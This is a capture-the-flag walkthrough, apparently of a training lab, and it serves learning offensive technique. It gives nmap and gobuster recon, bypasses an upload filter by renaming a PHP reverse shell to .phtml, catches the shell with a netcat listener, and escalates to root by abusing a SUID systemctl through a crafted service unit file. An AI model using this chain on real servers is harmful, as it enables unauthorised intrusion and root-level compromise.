RECONNAISSANCE :
nmap -A -sT 10.10.234.51 -p-
nmap -O -sT 10.10.234.51 to gather OS info
Task 2 : Locating directories with gobuster:
gobuster dir -u http://10.10.234.51:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
so i found that the /internal directory is the one with the upload form andn next we try uploading the files to check whihc file type is supported. Our goal here to be able to upload a shell.
look for the pages source code to find somthing juicy, nope nothing there.
capture the upload request in the burp suite, while trying to uplod your shell
and then use intruder to run a sniper attack to find out which file type is allowed to be uploaded.
inmy case burp did not work with the intruder attack so i did it manually for my payload.
our payload shell can be found in /usr/share/webshells/php, just update the ip and port before upload.
no we know that acceptable format is phml, we will convert it into a phtmp via
mv command
mc shell.php shell.phtml and upload it to the webserver.
run gobuster again on server,
gobuster dir -u http://10.10.234.51:3333/internal -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .phtml
and we find a uploads directory interesting, now our goal is to exeecute the shell on the webserver so that it connects to the netcat listner in oour terminal.
nc -lvnp 1234
once we get acces to the webserver we will. open the /etc/passwd file to get list of users and get answer to next question.
now we look for flag:
find / -name flag.txt -type f 2>/dev/null, no file found. Interestinf, we then open the hint and we get link to ourfile shebang!
Task 3 : Privilage escalation :
find a suid file :
find / -user root -perm -4000 -exec ls -ldb {} \;
file standing out :
/bin/systemctl
escalating the privilages:
well to start i trid to use the exploits in the Linus Privesc room, it did not work as it wont let me make a .c file, neither a .sh file, it wont let me access the /etc/shadow file as well. we dont have any sudo permissions as we can see from sudo -l command.
To put cherry on the cake they had the crontabs disabled.
took hint from video, so the GTFO bins were used.
https://gtfobins.github.io/
https://n0w4n.nl/vulnversity/
So systemctl is the controlling interface and the inspection tool for systemd. Systemd initializes the user space components when the linux kernel is booted and also maintains then through out the lifecycle of the sessions.
Each component is referred to as a unit and has a unit file attached to it.
Questions :what re user space components?
Answer : It refers to all the code that runs outside the kernel. It refers to various programs and libraries that a OS uses to interact with the kernel.
Bascially it is all the services and softeare installed on your linux machine, all of it is managed by systemd. ech process is a unit with its own unit file. We can create our own unit filesas well and thats what we do here. by default these files are loacted in /etc/system/systemd. but we cant access it, so we careate an enviournent variable that holds the file
Make a unit file :
moses=$(mktemp).service
mktemp id ued to create empty temporary files and .service is extension for a service unit and we store it in or newly created system vatriable moses.
echo ‘[Service] : [Service] is a section header used in a systemd service unit file.
ExecStart=/bin/sh -c “cat /root/root.txt > /tmp/output”
ExecStart specifies the full path of a command that will be executed to start a service.
so it will execute the bash shell and in turn bash shell will runt the command “cat /root/root.txt > /tmp/output”, -c is for command.
[Install] = manipulates behaviour of a unit file, or a unit if it is enabled or disabled.
WantedBy=multi-user.target’ > $moses
wantedby is a common way to specify how a unit should be enabled. if the current unit has WantedBy=multi-user.target, a directory called multi-user.target.wants will be created within /etc/systemd/system (if not already available) and a symbolic link to the current unit will be placed within. Disabling this unit removes the link and removes the dependency relationship.
and all this is stored in our local variable $moses
now, the easy part
/bin/systemctl link $moses
this command will create a link between our service and its unit file and we get a message like this. it will allow us to start or stop the service as we want.
Created symlink from /etc/systemd/system/tmp.PtnS8Qb5fp.service to /tmp/tmp.PtnS8Qb5fp.service.
/bin/systemctl enable — now $moses, now we shall get our file as output in the tmp folder open it an grab the flag
